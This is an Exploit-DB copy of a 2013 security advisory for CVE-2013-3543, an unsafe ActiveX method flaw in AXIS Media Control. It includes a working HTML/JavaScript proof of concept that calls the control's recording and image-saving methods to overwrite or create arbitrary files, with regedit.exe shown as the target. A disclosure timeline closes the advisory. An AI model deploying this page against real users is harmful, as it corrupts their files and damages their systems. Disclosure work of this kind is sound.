AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method

EDB-ID:

26173




Platform:

Windows

Date:

2013-06-13


========================================================================
AXIS
====================================================================
========================================================================

1.Advisory Information
Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
A vulnerability has been found in this devices:
-CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618)

3.Affected Products
CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected
The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012)

4.PoC
4.1.Exposed Unsafe ActiveX Method - File Corruption.
In the vendor web, you could see that “AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer.”
Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.
The vulnerability exists due to the ActiveX control including insecure "StartRecord()",  "SaveCurrentImage()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL. 
This can be exploited to corrupt or create arbitrary files in the context of the current user.
In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods:
 
When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage:
 
The following code could be used to test the vulnerability:
_____________________________________________________________________________
<html>
    <head>
        <title></title>
        <script language="javaScript" type="text/javascript">
            function startRecord(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              MyActiveX.StartRecord(theFile);
            }
            function saveCurrentImage(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              var theFormat = 1;
              MyActiveX.SaveCurrentImage(theFormat, theFile);
            }
            function startRecordMedia(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              var theFlags = 1;
              var theMediaTypes  = "default"
              MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
            }
        </script>
    </head>
    <body>
    <object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480">
    <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg">
    <param name="MediaType" value="mjpeg">
    <param name="Volume" value="1">
    <param name="ShowStatusBar" value="1">
    <param name="ShowToolbar" value="1">
    <param name="AutoStart" value="1">
    <param name="UIMode" value="ptz-relative">
    <param name="MediaType" value="mjpeg-unicast">
    <param name="StretchToFit" value="0">
    < param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi> 
    </object>
    <br>
    <INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
    <INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
    <INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
    </body>
</html>
_____________________________________________________________________________

5.Credits
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.

6.Report Timeline
-2013-05-24: Students team notifies the Axis Customer Support of the vulnerability
-2013-05-24: Axis team asks for a report with technical information. 
-2013-05-26: Technical details sent to Axis. 
-2013-05-27: Axis team reports to the technical support to analyze the vulnerability.